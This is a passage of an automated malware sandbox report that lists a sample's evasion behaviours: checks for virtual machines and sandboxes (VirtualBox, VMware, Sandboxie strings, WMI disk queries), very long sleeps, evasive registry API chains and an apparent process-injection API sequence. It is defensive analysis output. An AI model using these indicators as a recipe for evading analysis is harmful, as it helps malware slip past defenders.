Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 37_2_0000000140001868
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxMiniRdrDN
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5496 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4394 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6260
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3426
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1584
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5517
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 445
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 409
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1650
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 626
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 385
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 378
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 372
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 366
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\cmd.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\cmd.exe API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.6 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe API coverage: 9.1 %
Source: C:\Windows\System32\lsass.exe API coverage: 4.9 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.1 %
Source: C:\Windows\System32\dwm.exe API coverage: 9.0 %
Source: C:\Windows\System32\wbem\WMIADAP.exe API coverage: 8.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052 Thread sleep count: 5496 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052 Thread sleep count: 4394 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 7945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 1735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844 Thread sleep count: 1584 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844 Thread sleep count: 5517 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7012 Thread sleep count: 280 > 30
Source: C:\Windows\System32\dllhost.exe TID: 6948 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1720 Thread sleep count: 445 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1720 Thread sleep time: -44500s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 6436 Thread sleep count: 303 > 30
Source: C:\Windows\System32\lsass.exe TID: 6436 Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6584 Thread sleep count: 409 > 30
Source: C:\Windows\System32\svchost.exe TID: 6584 Thread sleep time: -40900s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7308 Thread sleep count: 185 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6668 Thread sleep count: 1650 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6668 Thread sleep count: 626 > 30
Source: C:\Windows\System32\svchost.exe TID: 7348 Thread sleep count: 385 > 30
Source: C:\Windows\System32\svchost.exe TID: 7348 Thread sleep time: -38500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7304 Thread sleep count: 378 > 30
Source: C:\Windows\System32\svchost.exe TID: 7304 Thread sleep time: -37800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5000 Thread sleep count: 372 > 30
Source: C:\Windows\System32\svchost.exe TID: 5000 Thread sleep time: -37200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2844 Thread sleep count: 366 > 30
Source: C:\Windows\System32\svchost.exe TID: 2844 Thread sleep time: -36600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5160 Thread sleep count: 302 > 30
Source: C:\Windows\System32\svchost.exe TID: 5160 Thread sleep time: -30200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2448 Thread sleep count: 347 > 30
Source: C:\Windows\System32\svchost.exe TID: 2448 Thread sleep time: -34700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3176 Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 3176 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1464 Thread sleep count: 326 > 30
Source: C:\Windows\System32\svchost.exe TID: 1464 Thread sleep time: -32600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2112 Thread sleep count: 334 > 30
Source: C:\Windows\System32\svchost.exe TID: 2112 Thread sleep time: -33400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2248 Thread sleep count: 319 > 30
Source: C:\Windows\System32\svchost.exe TID: 2248 Thread sleep time: -31900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5440 Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 5440 Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5292 Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 5292 Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1404 Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 1404 Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7844 Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 7816 Thread sleep count: 297 > 30
Source: C:\Windows\System32\svchost.exe TID: 7852 Thread sleep count: 294 > 30
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2D894 FindFirstFileExW, 18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C5D894 FindFirstFileExW, 18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E6D894 FindFirstFileExW, 19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E9D894 FindFirstFileExW, 19_2_0000013F08E9D894
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186DD894 FindFirstFileExW, 36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DABDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DABD894 FindFirstFileExW, 37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD7D894 FindFirstFileExW, 37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC64D894 FindFirstFileExW, 38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC67D894 FindFirstFileExW, 38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AED894 FindFirstFileExW, 39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B1D894 FindFirstFileExW, 39_2_00000202C0B1D894
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A66130D894 FindFirstFileExW, 40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDCD894 FindFirstFileExW, 41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDFD894 FindFirstFileExW, 41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_000002705306DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_000002705306D894 FindFirstFileExW, 42_2_000002705306D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.10.dr Binary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmusrvc2b
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: VMware SATA CD00
Source: Amcache.hve.10.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 0000002F.00000002.3076142932.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
